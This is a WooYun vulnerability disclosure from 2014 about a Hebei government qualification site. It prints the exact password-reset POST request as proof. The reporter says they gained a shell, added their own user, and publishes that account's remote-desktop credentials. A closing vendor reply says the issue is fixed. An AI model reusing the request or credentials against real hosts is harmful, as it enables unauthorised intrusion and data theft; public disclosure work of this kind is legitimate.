漏洞详情

披露状态:

2014-03-03: 细节已通知厂商并且等待厂商处理中
2014-03-08: 厂商已经确认,细节仅向厂商公开
2014-03-18: 细节向核心白帽子及相关领域专家公开
2014-03-28: 细节向普通白帽子公开
2014-04-07: 细节向实习白帽子公开
2014-04-17: 细节向公众公开

简要描述:

...............

详细说明:

...........

漏洞证明:

URL:http://zyzg.heca.gov.cn/forgot.aspx
data:__VIEWSTATE=%2FwEPDwUJNjQ1OTI2NjE5D2QWAgIDD2QWAgIDDxYCHgtfIUl0ZW1Db3VudAIKFhRmD2QWBAIBDxYCHgRocmVmBRJEZWZhdWx0LmFzcHg%2FSWQ9NzkWAmYPFQEr5YWz5LqOMjAxMuW5tOS4ree6p%2BawtOW5s%2BiAg%2BivleWQiOagvOiAheKApmQCAg8VARIyMDEzLTktMjIgMTE6MDc6MDJkAgEPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTc4FgJmDxUBM%2BWFs%2BS6juihpeWKnueOsOS7u%2BS4k%2BS4muaKgOacr%2BiBjOWKoeS7u%2BiBjOi1hOagvOKApmQCAg8VAREyMDEzLTktMjIgOTo1Njo0MGQCAg9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NzcWAmYPFQEr5YWz5LqO5YWs5biDMjAxM%2BW5tOW6puiBjOensOiAg%2BivleWQiOagvOKApmQCAg8VARIyMDEzLTktMTEgMTE6MjU6MjJkAgMPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTcwFgJmDxUBK%2BWFs%2BS6jjIwMTPlubTluqbkuJPkuJrmioDmnK%2FogYzliqHku7vogYzigKZkAgIPFQEQMjAxMy01LTcgODozOTo0MWQCBA9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NjgWAmYPFQEr5YWz5LqOMjAxM%2BW5tOW6pumdnuWFrOacieWItuS8geS4muS4k%2BS4muKApmQCAg8VAREyMDEzLTUtNiAxNjo1MTo0OGQCBQ9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NjcWAmYPFQES6KGo5qC85aGr5YaZ5qih5p2%2FZAICDxUBETIwMTMtNS02IDE2OjQ3OjM1ZAIGD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02NhYCZg8VATHmraPpq5jnuqflt6XnqIvluIjor4TlrqHmnaHku7blhoDogYzmlLnlrZfvvIgy4oCmZAICDxUBETIwMTMtNS02IDE2OjQ2OjQ5ZAIHD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02NRYCZg8VATPpq5jnuqflt6XnqIvluIjjgIHlt6XnqIvluIjor4TlrqHmnaHku7blhoDogYzmlLnigKZkAgIPFQERMjAxMy01LTYgMTY6NDU6MjJkAggPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTYyFgJmDxUBMeWKqeeQhuW3peeoi%2BW4iOivhOWuoeadoeS7tuWGgOiBjOaUueWKnuWtl%2B%2B8iDLigKZkAgIPFQESMjAxMi0xMC0xMiA4OjUyOjAxZAIJD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02ORYCZg8VARnms6jlhowv55m75b2V5biu5Yqp5paH5Lu2ZAICDxUBETIwMTMtNS02IDE2OjUzOjQ2ZGQ%3D&txtEmail=safe3q%40gmail.com&LoginButton=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81&txtIDNumber=88952634(此处可为任意数字)

QQ截图20140303135944.png


经过端口扫描 发现3389开的
权限那么高 可以cmd shell 可以加用户之类的 我加了一个 (怎么加的 你懂得)

远程桌面 zyzg.heca.gov.cn

用户名 :123456 密码如用户名

QQ截图20140303140312.png



可以偷窥 暂停网站的运行 删除重要文件 窃取有关信息 等等等等等

修复方案:

........................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-08 11:29

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,作为紧急事件处置,河北分中心反馈已经完成修复。

最新状态:

暂无


漏洞评价: